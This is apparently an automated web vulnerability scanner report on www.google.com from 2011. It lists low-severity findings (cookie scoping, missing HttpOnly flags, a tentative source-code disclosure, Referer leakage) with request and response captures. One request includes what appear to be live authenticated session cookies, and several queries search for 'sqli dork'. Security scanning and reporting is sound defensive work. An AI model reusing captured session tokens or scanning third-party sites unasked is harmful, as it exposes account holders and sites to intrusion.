HTTP/1.1 200 OK Date: Tue, 06 Dec 2011 07:31:21 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=223135319ea33765:FF=0:TM=1323156681:LM=1323156681:S=3l98eGxGiMROcvRp; expires=Thu, 05-Dec-2013 07:31:21 GMT; path=/; domain=.google.com Set-Cookie: NID=53=Vtv_QV1Q6UxHxQWo466-JEjlo15roTKfIYGgrysBsZ4OALdB1cq5hsfsXZyPksFy2l3RPqyJhxCXkhBEG2uxvo872Qu9ME9W7G75hdhJf3XW8upz1n4ii6n6vW_owITy; expires=Wed, 06-Jun-2012 07:31:21 GMT; path=/; domain=.google.com; HttpOnly Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="Google Images. The most comprehensive image search on the web."><title>G ...[SNIP]...
|
2.6. http://www.google.com/preferences
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/preferences |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- PREF=ID=319e8c62fe495302:FF=0:TM=1323156679:LM=1323156679:S=Mna5rmJUIVd1u3i_; expires=Thu, 05-Dec-2013 07:31:19 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /preferences HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Tue, 06 Dec 2011 07:31:19 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=319e8c62fe495302:FF=0:TM=1323156679:LM=1323156679:S=Mna5rmJUIVd1u3i_; expires=Thu, 05-Dec-2013 07:31:19 GMT; path=/; domain=.google.com Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Preferences</title><style>body,td,div,.p,a{font-family:arial,sans-serif}.ts{border-collapse:collaps ...[SNIP]...
|
2.7. http://www.google.com/reviews/scripts/annotations_bootstrap.js
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/reviews/scripts/annotations_bootstrap.js |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- PREF=ID=dd199329b90f9175:TM=1323156653:LM=1323156653:S=Q6uTdIB376We9PbN; expires=Thu, 05-Dec-2013 07:30:53 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /reviews/scripts/annotations_bootstrap.js HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Expires: Fri, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: max-age=0, must-revalidate Set-Cookie: PREF=ID=dd199329b90f9175:TM=1323156653:LM=1323156653:S=Q6uTdIB376We9PbN; expires=Thu, 05-Dec-2013 07:30:53 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Content-Disposition: attachment Date: Tue, 06 Dec 2011 07:30:53 GMT Server: zfe X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
(function(){ window['google'] = window['google'] || {}; window['google']['annotations'] = window['google']['annotations'] || {}; if (!window['google']['annotations']['loaded']) { window['google']['an ...[SNIP]...
|
2.8. http://www.google.com/search
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/search |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- PREF=ID=3d859161b759707c:FF=0:TM=1323156664:LM=1323156664:S=CrA6U_6A5uJvBosa; expires=Thu, 05-Dec-2013 07:31:04 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 302 Found Location: http://www.google.com/webhp Cache-Control: private Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=3d859161b759707c:FF=0:TM=1323156664:LM=1323156664:S=CrA6U_6A5uJvBosa; expires=Thu, 05-Dec-2013 07:31:04 GMT; path=/; domain=.google.com Date: Tue, 06 Dec 2011 07:31:04 GMT Server: gws Content-Length: 224 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"> <TITLE>302 Moved</TITLE></HEAD><BODY> <H1>302 Moved</H1> The document has moved <A HREF="http://www.google.com/webhp">her ...[SNIP]...
|
2.9. http://www.google.com/webhp
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/webhp |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- PREF=ID=d98c88b0637a0f09:FF=0:TM=1323156679:LM=1323156679:S=hhEVROfjxjS157lt; expires=Thu, 05-Dec-2013 07:31:19 GMT; path=/; domain=.google.com
- NID=53=qTtOMYjuXYBzy2nJpwjWNKR-mkygU2i7oG60B5Ov7OiVsHldwtabuvnXO0Y9_RKzofnbaWTqQb-g-eaH1rFkdp8lab3GICgYwDwtISOD0HH1IKQkChuBystTNQxWuAyi; expires=Wed, 06-Jun-2012 07:31:19 GMT; path=/; domain=.google.com; HttpOnly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /webhp HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Tue, 06 Dec 2011 07:31:19 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=d98c88b0637a0f09:FF=0:TM=1323156679:LM=1323156679:S=hhEVROfjxjS157lt; expires=Thu, 05-Dec-2013 07:31:19 GMT; path=/; domain=.google.com Set-Cookie: NID=53=qTtOMYjuXYBzy2nJpwjWNKR-mkygU2i7oG60B5Ov7OiVsHldwtabuvnXO0Y9_RKzofnbaWTqQb-g-eaH1rFkdp8lab3GICgYwDwtISOD0HH1IKQkChuBystTNQxWuAyi; expires=Wed, 06-Jun-2012 07:31:19 GMT; path=/; domain=.google.com; HttpOnly Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="Search the world's information, including webpages, images, videos a ...[SNIP]...
|
3. Cookie without HttpOnly flag set
previous
next
There are 9 instances of this issue:
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
3.1. http://www.google.com/sorry/image
previous
next
Summary
Severity: |
Low |
Confidence: |
Firm |
Host: |
http://www.google.com |
Path: |
/sorry/image |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- GDSESS=ID=74cf1763b3bbbbaf:TM=1323154164:C=c:IP=174.36.218.2-:S=ADSvE-d0LSvK62oqpjOZgRrt0uRcrK7IvA; path=/; domain=google.com; expires=Tue, 06-Dec-2011 09:49:24 GMT
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sorry/image?id=12411461530739070132&hl=en HTTP/1.1 Host: www.google.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.google.com/sorry/?continue=http://www.google.com/search%3Fq%3Dsqli%2Bdork%26hl%3Den%26tbo%3D1%26gbv%3D2%26tbs%3Dqdr:d%26tbm%3Dnws%26sa%3DX%26ei%3DVLndTqK-O6nX0QHcusXIBw%26ved%3D0CBQQpwUoAw Cookie: PREF=ID=810b7e02f363f054:U=b71d815a5621c71c:FF=0:TM=1323101452:LM=1323153709:S=Ke1s7Rrx66OSu7aG; NID=53=aFV4Q7lzlA4g6hZ9Rki3DYK8hz1kGzocOZJI_w6eu6JH96dgw9nfloRt3_epIdfu1eIfKEVGXPRaSeg1Gk3GPPiFOlJXq1zd78kLwVzQe98Ltf17rS5LHcjEaSV7RjqH; SID=DQAAAN4AAABOxcVOIe64XB4IDSBk50we4ADMhkfgwJ24ZFchXWED5m9jgoUCD-gzNoxTvoa7L8sT3kcKU21dRS7G-mfY_oNuln-d04c_vYrXYg6DOfgbePnpZGg0HjXXRHklNUIngxWRXfJDliGBCr6E7fsnNy0KZCYhEPWiD58sxgfliIu0ZdMb-I_76fh5GqJflIw10c4o33gacknvYck2VX0OBDtsqzrrswhFW83K-Feh0RR1oG1-vK1FKycexSutDkT58OJCM73iPrteYQHzMQpskrwwNyNU8W5iwW4FONtbnZnFpA; HSID=AkB-N4ozDLm5DGQwb; APISID=R5nZIIrTQ8g_RUzK/A-Dgpt3yN1aY4sHSD
|
Response
HTTP/1.1 200 OK Content-Type: image/jpeg Set-Cookie: GDSESS=ID=74cf1763b3bbbbaf:TM=1323154164:C=c:IP=174.36.218.2-:S=ADSvE-d0LSvK62oqpjOZgRrt0uRcrK7IvA; path=/; domain=google.com; expires=Tue, 06-Dec-2011 09:49:24 GMT Date: Tue, 06 Dec 2011 06:49:24 GMT Server: HTTP server (unknown) Content-Length: 2991 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Expires: Tue, 06 Dec 2011 06:49:24 GMT Cache-Control: private
......JFIF..............128607e2cdfc6a5b....C........... . ................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!22222222222222222222222222222222222222222222222222......F...."......... ...[SNIP]...
|
3.2. http://www.google.com/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/ |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- PREF=ID=573005efdace859a:FF=0:TM=1323156655:LM=1323156655:S=WlQQNHmzXAWs6Rn1; expires=Thu, 05-Dec-2013 07:30:55 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Tue, 06 Dec 2011 07:30:55 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=573005efdace859a:FF=0:TM=1323156655:LM=1323156655:S=WlQQNHmzXAWs6Rn1; expires=Thu, 05-Dec-2013 07:30:55 GMT; path=/; domain=.google.com Set-Cookie: NID=53=i-HZlgIBqvU9fnl1F4dnNL2PiBe8Eydkr9vjP7FEUT5iJQW_pwITkBP4azjBVQoB-yOnrkc2vOMhuD3ai0EUCv-OFETABLEkc9vnxA_rVikvNoUHAWoPDryUpnBlnx9Y; expires=Wed, 06-Jun-2012 07:30:55 GMT; path=/; domain=.google.com; HttpOnly Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="Search the world's information, including webpages, images, videos a ...[SNIP]...
|
3.3. http://www.google.com/advanced_image_search
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/advanced_image_search |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- PREF=ID=301685694bc7a5cf:FF=0:TM=1323156693:LM=1323156693:S=IkR5W9Yz3pCk62u1; expires=Thu, 05-Dec-2013 07:31:33 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /advanced_image_search HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Tue, 06 Dec 2011 07:31:33 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=301685694bc7a5cf:FF=0:TM=1323156693:LM=1323156693:S=IkR5W9Yz3pCk62u1; expires=Thu, 05-Dec-2013 07:31:33 GMT; path=/; domain=.google.com Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Image Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visite ...[SNIP]...
|
3.4. http://www.google.com/gen_204
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/gen_204 |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- PREF=ID=cf6bfeeb713e3477:FF=0:TM=1323156680:LM=1323156680:S=Rm2hZ06UUsGbWamx; expires=Thu, 05-Dec-2013 07:31:20 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gen_204?atyp=i&zx= HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=cf6bfeeb713e3477:FF=0:TM=1323156680:LM=1323156680:S=Rm2hZ06UUsGbWamx; expires=Thu, 05-Dec-2013 07:31:20 GMT; path=/; domain=.google.com Date: Tue, 06 Dec 2011 07:31:20 GMT Server: gws Content-Length: 0 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
|
3.5. http://www.google.com/imghp
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/imghp |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- PREF=ID=223135319ea33765:FF=0:TM=1323156681:LM=1323156681:S=3l98eGxGiMROcvRp; expires=Thu, 05-Dec-2013 07:31:21 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /imghp HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Tue, 06 Dec 2011 07:31:21 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=223135319ea33765:FF=0:TM=1323156681:LM=1323156681:S=3l98eGxGiMROcvRp; expires=Thu, 05-Dec-2013 07:31:21 GMT; path=/; domain=.google.com Set-Cookie: NID=53=Vtv_QV1Q6UxHxQWo466-JEjlo15roTKfIYGgrysBsZ4OALdB1cq5hsfsXZyPksFy2l3RPqyJhxCXkhBEG2uxvo872Qu9ME9W7G75hdhJf3XW8upz1n4ii6n6vW_owITy; expires=Wed, 06-Jun-2012 07:31:21 GMT; path=/; domain=.google.com; HttpOnly Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="Google Images. The most comprehensive image search on the web."><title>G ...[SNIP]...
|
3.6. http://www.google.com/preferences
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/preferences |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- PREF=ID=319e8c62fe495302:FF=0:TM=1323156679:LM=1323156679:S=Mna5rmJUIVd1u3i_; expires=Thu, 05-Dec-2013 07:31:19 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /preferences HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Tue, 06 Dec 2011 07:31:19 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=319e8c62fe495302:FF=0:TM=1323156679:LM=1323156679:S=Mna5rmJUIVd1u3i_; expires=Thu, 05-Dec-2013 07:31:19 GMT; path=/; domain=.google.com Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Preferences</title><style>body,td,div,.p,a{font-family:arial,sans-serif}.ts{border-collapse:collaps ...[SNIP]...
|
3.7. http://www.google.com/reviews/scripts/annotations_bootstrap.js
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/reviews/scripts/annotations_bootstrap.js |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- PREF=ID=dd199329b90f9175:TM=1323156653:LM=1323156653:S=Q6uTdIB376We9PbN; expires=Thu, 05-Dec-2013 07:30:53 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /reviews/scripts/annotations_bootstrap.js HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Expires: Fri, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: max-age=0, must-revalidate Set-Cookie: PREF=ID=dd199329b90f9175:TM=1323156653:LM=1323156653:S=Q6uTdIB376We9PbN; expires=Thu, 05-Dec-2013 07:30:53 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Content-Disposition: attachment Date: Tue, 06 Dec 2011 07:30:53 GMT Server: zfe X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
(function(){ window['google'] = window['google'] || {}; window['google']['annotations'] = window['google']['annotations'] || {}; if (!window['google']['annotations']['loaded']) { window['google']['an ...[SNIP]...
|
3.8. http://www.google.com/search
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/search |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- PREF=ID=3d859161b759707c:FF=0:TM=1323156664:LM=1323156664:S=CrA6U_6A5uJvBosa; expires=Thu, 05-Dec-2013 07:31:04 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 302 Found Location: http://www.google.com/webhp Cache-Control: private Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=3d859161b759707c:FF=0:TM=1323156664:LM=1323156664:S=CrA6U_6A5uJvBosa; expires=Thu, 05-Dec-2013 07:31:04 GMT; path=/; domain=.google.com Date: Tue, 06 Dec 2011 07:31:04 GMT Server: gws Content-Length: 224 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"> <TITLE>302 Moved</TITLE></HEAD><BODY> <H1>302 Moved</H1> The document has moved <A HREF="http://www.google.com/webhp">her ...[SNIP]...
|
3.9. http://www.google.com/webhp
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/webhp |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- PREF=ID=d98c88b0637a0f09:FF=0:TM=1323156679:LM=1323156679:S=hhEVROfjxjS157lt; expires=Thu, 05-Dec-2013 07:31:19 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webhp HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Tue, 06 Dec 2011 07:31:19 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=d98c88b0637a0f09:FF=0:TM=1323156679:LM=1323156679:S=hhEVROfjxjS157lt; expires=Thu, 05-Dec-2013 07:31:19 GMT; path=/; domain=.google.com Set-Cookie: NID=53=qTtOMYjuXYBzy2nJpwjWNKR-mkygU2i7oG60B5Ov7OiVsHldwtabuvnXO0Y9_RKzofnbaWTqQb-g-eaH1rFkdp8lab3GICgYwDwtISOD0HH1IKQkChuBystTNQxWuAyi; expires=Wed, 06-Jun-2012 07:31:19 GMT; path=/; domain=.google.com; HttpOnly Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="Search the world's information, including webpages, images, videos a ...[SNIP]...
|
4. Source code disclosure
previous
next
Summary
Severity: |
Low |
Confidence: |
Tentative |
Host: |
http://www.google.com |
Path: |
/support/accounts/bin/answer.py |
Issue detail
The application appears to disclose some server-side source code written in PHP.
Issue background
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.
Request
GET /support/accounts/bin/answer.py?answer=27444&hl=en&ctx=ch_ServiceLoginAuth&p=recaptcha HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Set-Cookie: N_T=sess%3D742cbbb370cc7d57%26v%3D2%26c%3Dd071389a%26s%3D4eddc4b3%26t%3DA%3A0%3A27444%26sessref%3D%2523recaptcha; Expires=Tue, 06-Dec-2011 08:00:59 GMT; Path=/support; HttpOnly Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Dec 2011 07:30:59 GMT Expires: Tue, 06 Dec 2011 07:30:59 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <pre style="font-size: 0;display: none;visibility: hidden;">
</pre> <html lang="en" class=""> <head> <scrip ...[SNIP]... <div class="searchbox"> <? # Set hidden input fields. # ?> <form name="search-form" id="search-form" title="Search Help" method="get" action="/support/accounts/bin/search.py" onsubmit="track('Search Help', document.getElementById('query').value);return false; ...[SNIP]...
|
5. Cross-domain Referer leakage
previous
next
There are 10 instances of this issue:
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
5.1. http://www.google.com/advanced_image_search
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/advanced_image_search |
Issue detail
The page was loaded from a URL containing a query string:- http://www.google.com/advanced_image_search?q=sqli+dork&hl=en&gbv=2&tbs=qdr:d&tbm=isch&tbo=1
The response contains the following link to another domain:- http://www.youtube.com/?q=sqli+dork&hl=en&tab=i1
Request
GET /advanced_image_search?q=sqli+dork&hl=en&gbv=2&tbs=qdr:d&tbm=isch&tbo=1 HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Tue, 06 Dec 2011 07:31:33 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=a3dd17cf63d528f5:FF=0:TM=1323156693:LM=1323156693:S=xQ9Q9x1XodhcHH96; expires=Thu, 05-Dec-2013 07:31:33 GMT; path=/; domain=.google.com Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Image Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visite ...[SNIP]... <li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/?q=sqli+dork&hl=en&tab=i1" onclick="gbar.logger.il(1,{t:36})">YouTube</a> ...[SNIP]...
|
5.2. http://www.google.com/finance
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/finance |
Issue detail
The page was loaded from a URL containing a query string:- http://www.google.com/finance?hl=en&q=sqli+dork&gbv=2&gs_sm=e&gs_upl=3020l4402l0l4519l9l5l0l0l0l0l0l0ll0l0&um=1&ie=UTF-8&sa=N&tab=we
The response contains the following links to other domains:- http://googlefinanceblog.blogspot.com/
- http://www.google.ca/finance
- http://www.youtube.com/?q=sqli+dork&hl=en&ie=UTF-8&tab=e1
Request
GET /finance?hl=en&q=sqli+dork&gbv=2&gs_sm=e&gs_upl=3020l4402l0l4519l9l5l0l0l0l0l0l0ll0l0&um=1&ie=UTF-8&sa=N&tab=we HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Dec 2011 07:31:28 GMT Expires: Tue, 06 Dec 2011 07:31:28 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Connection: close
<!DOCTYPE html><html><head><script>(function(){function a(c){this.t={};this.tick=function(c,e,b){b=void 0!=b?b:(new Date).getTime();this.t[c]=[b,e]};this.tick("start",null,c)}var d=new a;window.jstimi ...[SNIP]... <li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/?q=sqli+dork&hl=en&ie=UTF-8&tab=e1" onclick="gbar.logger.il(1,{t:36})">YouTube</a> ...[SNIP]... </a> - <a href="http://www.google.ca/finance" class="fjfe-edition-link">Canada</a> ...[SNIP]... </a> - <a href="http://googlefinanceblog.blogspot.com">Blog</a> ...[SNIP]...
|
5.3. http://www.google.com/finance
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/finance |
Issue detail
The page was loaded from a URL containing a query string:- http://www.google.com/finance?tab=we
The response contains the following links to other domains:- http://abcnews.go.com/Business/wireStory/asia-stocks-fall-sp-warns-euro-nations-15092656
- http://economictimes.indiatimes.com/news/news-by-industry/services/retailing/fdi-in-india-debate-rages-in-india-over-allowing-wal-marts/articleshow/11004160.cms
- http://googlefinanceblog.blogspot.com/
- http://www.bloomberg.com/news/2011-12-06/asia-stocks-drop-on-europe-concern.html
- http://www.bloomberg.com/news/2011-12-06/olympus-management-rotten-to-the-core-panel.html
- http://www.businessweek.com/news/2011-12-05/bp-says-halliburton-destroyed-evidence-in-gulf-spill-case.html
- http://www.freep.com/article/20111206/BUSINESS07/112060337/S-P-threatens-to-downgrade-ratings-of-15-eurozone-countries
- http://www.freep.com/article/20111206/NEWS07/112060373/Slower-snail-mail-poses-threat-to-small-businesses-Netflix-subscribers
- http://www.google.ca/finance
- http://www.marketwatch.com/story/asia-edges-lower-after-sps-europe-move-2011-12-05?link=MW_popular
- http://www.reuters.com/article/2011/12/06/us-eurozone-idUSTRE7B30AO20111206
